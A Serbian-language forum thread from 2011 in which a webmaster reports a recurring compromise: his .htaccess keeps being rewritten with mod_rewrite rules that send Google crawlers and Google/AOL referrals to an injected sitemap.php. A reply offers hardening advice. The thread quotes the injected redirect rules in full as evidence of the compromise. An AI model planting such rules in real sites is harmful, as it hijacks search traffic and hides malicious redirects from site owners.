[ autentik @ 21.01.2011. 10:26 ] @
tražio i nema pa rekoh da otvorim temu...


Ne mogu da verujem i ne znam samo kako se ovo desava ali evo...

Svakoga Dana po nekad i po dva puta kada kucam na Google moj sajt ja ne mogu da udjem na njega... kada ukucam normalno u browseru ono radi...


provalim da mi se u root-u sajta u fajlu .htaccess upise sledeci kod


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} google [OR]
RewriteCond %{HTTP_REFERER} (google|aol)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php|shtml|phtml)$ [NC]
RewriteCond %{REQUEST_FILENAME} !sitemap.php
RewriteCond /home/autentik/public_html/sitemap.php -f
RewriteRule ^.*$ /sitemap.php [L]
< /IfModule>



i da se fizicki napravi fajl sitemap.php u kome je nesto (virus ili vec sta) i posle toga preko googla nigde ni na jednu stranicu mog sajta ne moye da se udje...


Dobro problem je nadjen


Probam obrisem i sitemap.php i .htaccess - Sutra se ponovo stvori

Probam Change Attributs - dozvole i sitemap.php i .htaccess - Sutra se ponovo u tim fajlovima stvori isti kod kao i pre toga (normalno pre toga obrisem te kodove u tim fajlovima)

Dobro, pretpostavim da neko ubacuje to - odem na Server, pogledam logove... Ne, zadnji sam ja bio posle toga niko nije pristupao ni Cpanelu ni FTP-u

Dobro, ajde da skeniram ceo server i samo sajt sa onim Antivirusom u WHM-u i u Cpanelu sajta - nema nista, ne prepoznaje ga kao virus (normalno pre toga ga nisam obrisao da vidim da li ce da ga pronadje)

Pretpostavljam da taj virus ako je uopšte virus uđe preko neke scripte na mom sajtu... ali sad kako da je nađem koja je imam ih mali milion...

I pitam se da li je uopšte moguće da postoji neki virus koji može preko scripte da uđe na sajt da fizički stvori neku stranicu u Php-u ili da promeni dozvole nekoj stranici


šta mi je raditi...

Hvala unapred na odgovorima
[ maksvel @ 22.01.2011. 19:31 ] @
Kako su podešene dozvole nad veb-folderom? Ako nalog pod kojim radi veb-server nema potrebe da upisuje, postavi samo čitanje nad fajlovima, a za vlasnika stavi root-a.
I imaš li svoj .htaccess? Možda da ga napraviš i staviš mu immutable bit, da ne mogu da ga gaze.
Sistem ažuran? Tu mogu biti bušni i prateći programi, npr FTP server i sl.
Nije zgoreg ni da pokušaš da sakriješ informacije koje idu na strani 404 npr, kao što su verzije softvera i sl.


E, sad, ako je rupa u nekoj skripti, možda nije loše da pokušaš sa nekim webapp skenerom tipa w3af ili tako nešto...

(Ne znam kakav je hosting, da li možeš to da izvedeš...)